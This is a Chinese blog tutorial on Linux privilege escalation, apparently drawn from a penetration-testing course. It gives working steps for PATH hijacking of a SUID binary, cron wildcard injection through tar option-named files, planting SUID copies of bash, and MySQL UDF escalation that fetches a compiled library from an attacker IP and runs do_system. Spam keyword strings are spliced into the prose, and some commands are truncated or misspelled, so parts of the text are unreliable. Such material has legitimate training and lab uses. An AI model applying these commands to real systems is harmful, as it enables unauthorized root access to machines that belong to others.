LinuxGod

LinuxGod.net
Linux大神网——精选每一篇高品质的技术干货
  1. 首页
  2. 开源快讯
  3. 正文

Linux定时任务安全权限提升)

2023年1月16日 390点热度

权限提升-Linux定时任务&环境变量&数据库

linux执行权限和写权限_linux提升权限_termux提升root权限

termux提升root权限_linux执行权限和写权限_linux提升权限

权限提升

Linux权限

用户的权限用“id”命令来查看,权限分为uid、gid、groups,即属主、属组、其他

文件的权限又分为rwx,即读、写、执行,由三组二进制数据表示

Linux提权本地环境变量安全-Aliyun

提权条件:复制了SUID权限,还需要本地用户权限

提权原理:借环境变量的执行顺序永久免费linux服务器linux查看操作系统,替换了高权限的命令,获取权限

注意:虽然例子中的“shell”文件是我们自己写的,但这里是模拟的用户自己配置的有SUID权限的文件。我们替换了该文件中被调用的命令,获得了root权限的反弹窗口

替换命令的方法是借助环境变量会逐个文件夹找命令的运行逻辑,在被执行的命令之前就加一个同名的环境变量

提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发

手写文件demo.c,里面包含“ps”命令

#include

void main()

{

setuid(0);

setgid(0);

system(“ps”);

}

将demo.c编译成shell

gcc demo.c -o shell

将shell文件复制到目标机器中,给予SUID权限

增加环境变量,注意此时“tmp”文件夹还不是环境变量的文件夹

cp /bin/sh /tmp/ps

将“tmp”文件夹的内容划为环境变量

export PATH=/tmp:$PATH

执行“shell”触发,反弹一个窗口

./shell

查看权限,发现已经变成了root权限

id

Linux提权本地定时任务安全-Aliyun

第一种:路径问题(未实现)

提权原理:利用计划任务指向的文件的相对路径解析问题

计划任务使用相对路径来指定命令时,默认路径是“/usr/local/bin”。在当前用户的目录下创建相同名字的文件,会比默认路径优先级更高

提权过程:

查看当前的定时任务

cat /ect/crontab

在当前用户的目录下创建相同名字的文件,其中包含获取root权限的命令

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh

chmod +x /home/xiaodi/test.sh

/tmp/bash

第二种:命令问题(WS注入)

提权条件:有通配符的可以调用其他命令的命令被放入计划任务中

提权原理:利用通配符配合命令参数自定义命令实现提权

可以将通配符所匹配的内容写成命令的参数,调用其他命令

提权过程:

我们首先假设目标机器上有类似如下带有通配符的任务

不安全定时任务备份命令:

cd /home/undead/script;tar czf /tmp/backup.tar.gz *

新建“test.sh”,其中有获取root权限的命令

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/undead/script/test.sh

新建两个文件,文件名代替通配符时会和命令组合成新命令,执行“test.sh”

echo "" > "--checkpoint-action=exec=sh test.sh"

echo "" > --checkpoint=1

等到定时任务完成,调用已经获得root权限的bash

./bash -p

参考命令:其他命令是否可以请查看《Linux提权手法总结.pdf》

第三种:权限问题

提权原理:利用不安全的权限分配操作导致的定时文件覆盖

管理员没有正确的赋予权限,比如给了文件777的权限,导致定时任务可以被修改

Linux提权数据库MYSQL_UDF-Vulnhub

提权过程:Vulnhub某靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用Mysql提权Linux(Mysql版本区别同Windows)

探针IP及端口

nmap 192.168.76.0/24

利用phpmailer漏洞进行修改并反弹

python D:/Myproject/40974.py

nc -lvvp 4444

写入后门利用菜刀连接方便操作

echo '' >1.php

上传信息收集脚本进行提权信息收集

termux提升root权限_linux提升权限_linux执行权限和写权限

./LinEnum.sh

翻阅数据库配置文件获取root密码

利用Mysql提权searchsploit

下载mysql udf poc进行编译,建议在本地

wget

mv 1518 raptor_udf.c

gcc -g -c raptor_udf.c

编译成.so文件,即动态链接库

gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

mv raptor_udf.so 1518.so

上传或下载1518到目标服务器,这里是目标服务器下载从攻击方下载

wget [攻击者IP]/1518.so

进入数据库进行UDF导出(导出dll文件并执行命令执行函数实现提权,跟Windows一样)

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';

创建do_system函数调用

linux提升权限_linux执行权限和写权限_termux提升root权限

create function do_system returns integer soname '1518.so';

select do_system('chmod u+s /usr/bin/find');

配合使用find调用执行

touch xiaodi

find xiaodi –exec "whoami" ;

find xiaodi –exec "/bin/sh" ;

id

Linux提权提升简单总结归类-参考PDF

1.提权环境(web环境、本地环境),信息收集(SUID、定时任务、可能漏洞、第三方服务应用等)

2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本)

3.最新漏洞:本地searchsploit脚本及远程exploitdb站点搜索说明(简要使用)

4.其他提权方法如:密码复用,guidlinux提升权限linux提升权限,sudo等说明(运气,同理,鸡肋等)

SUDO说明参考:

涉及资源:

exploit database:

RAVEN: 2(vulnhub的靶场):,269/

exploitdb(Linux工具):

Linux下的tar压缩解压缩命令详解:

CVE-2019-14287:sudo权限绕过漏洞分析与复现:

本作品采用 知识共享署名 4.0 国际许可协议 进行许可
标签: 变量 命令 定时 权限 漏洞
最后更新:2023年1月16日

Linux大神网

每日更新,欢迎收藏♥ 不积跬步无以至千里,加油,共勉。

点赞
< 上一篇
下一篇 >

Linux大神网

每日更新,欢迎收藏♥
不积跬步无以至千里,加油,共勉。

最新 热点 随机
最新 热点 随机
Linux下如何使用vsftpd构建后的FTP服务器有哪些特点 Gcc编译器编译语言:C运行库C语言标准 提高网络编程功力的不二之选——Socket/IP协议 C语言教程之linuxC编程实战:linux电子书 #Ubuntu查看防火墙的状态#添加开放普通端口开放22:开启完成 Ubuntu18.04上安装GCC编译器通过终端执行以下命令命令 2019年Linux操作系统启动流程介绍-苏州安亲宝 如何安装Windows10下的WSL和mkfontdir命令? 获取内核源码:阅读linux内核设计的艺术 如何操作Linux启动盘?的安装目录信息详解 (多图预警)多篇Linux(centos7)安装流程 Ubuntu22.04最终发布最终RC版本号召大家积极进行进行测试 如何在Linux安装字体中用到各种命令如mkfontscale? 自带几个预设,你可以在Numix、Arc或Materia主题样式上创建自己的GTK主题 (架构)为什么要在Linux下写C++程序? Ubuntu中各种类型频繁发生的更新错误以及修复方法 图1.3编程的7个步骤,你知道吗? 虚拟机Linux安装教程及安装流程介绍-苏州安嘉 常用且流行的Linuxshell脚本编写工具:/Vim编辑器 Linux下统计C语言程序执行时间的几种常用方法
:身份证明检索失败开始->进程的配置文件微控制器简化存储数据的组织形式如何从Elrepo或者源代码来安装最新的Linux内核4.0Linux下ldd命令的使用方法本身不是一个程序炫龙毁灭者DC还是不能关机和重启内核的窝如何在Ubuntu下修改root用户的密码?Linux系统迁移到另一个硬盘小时就迁移完成了炫龙毁灭者DC还是不能关机和重启内核的窝如何使用Python处理文件数据-程序员必读结合虚拟化技术分析Linux系统的一般执行过程Linux中常用的域名解析命令包括哪些?(回答)炫龙毁灭者DC还是不能关机和重启内核的窝VMware如何安装UbuntuWorkstation虚拟机的博客~(官方个人免费版)开发嵌入式Linux按键驱动程序开发-电脑版软件功能强大,界面简洁明晰、操作方便快捷CentOS8安装新的java环境卸载老版本下载环境介绍Android终端仿真器安装Python的注意事项!!在Linux系统中安装和配置JDK有两种方法可以选择当前Linux系统的版本的方法及使用方法系统管理员使用的系统级别的管理命令和程序包
2017年04月14日11:25嵌入式系统介绍 C语言教程-Qt.12安装教程05-27 UbuntuLinux系统上配置DNS名称服务器IP地址的操作方法 linux 创建链接文件 Linux链接分两种,一种被称为硬链接(SymbolicLink) 查看Linux内核Kernel的场景情况查看的几种方式 10.5内核定时器编程TIMER_SOFTIRQ软中断,运行当前处理器CPU上到期的所有定时器 Linux和GNU的开源性吸引了哪些优秀的程序员? 轻松掌握linux ldd命令的技巧,成为高效开发者与管理员 unix网络编程百度云 Python:为什么要学Python? 你期待什么专业软件推出Web网页版本呢? Linux系统内核的高效和稳定已在各个领域内得到大量事实验证 MariusGripsgrd宣布把Ubuntu系统移植到谷歌Nexus6上 ARM-Linux应用开发和单片机开发的不同ARM的应用 机械硬盘安装双系统或多系统不是难事? 如何找到Linux内核的内核版本和发行版? 关机/重启命令有shutdown、halt、reboot、及init CentOS设置IP地址实用技巧及注意事项,轻松掌握正确设置方法 FATFS文件系统负责管理和存储文件信息的特点及应用 解决Windows文件在Ubuntu解压后文件名出现文件名乱码的问题 100款软件分类图,我只能说一句你OUT了
标签聚合
应用 内核 操作 命令 文件 文件目录 软件 虚拟机 linux系统 linux服务器
书籍
课程
技术群
技术干货大合集↓
  • 2023年12月 / 15篇
  • 2023年11月 / 88篇
  • 2023年10月 / 94篇
  • 2023年9月 / 90篇
  • 2023年8月 / 93篇
  • 2023年7月 / 94篇
  • 2023年6月 / 90篇
  • 2023年5月 / 93篇
  • 2023年4月 / 90篇
  • 2023年3月 / 129篇
  • 2023年2月 / 84篇
  • 2023年1月 / 161篇
  • 2022年12月 / 187篇
  • 2022年11月 / 76篇
友情链接:

Linux书籍 | Linux命令 | Linux系统 | RHCE红帽认证 | Linux软件 | Linux教程 | CentOS系统 | Linux内核 | Linux服务器 | Linux大神 | IT资源

COPYRIGHT © 2024 linuxgod.net ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang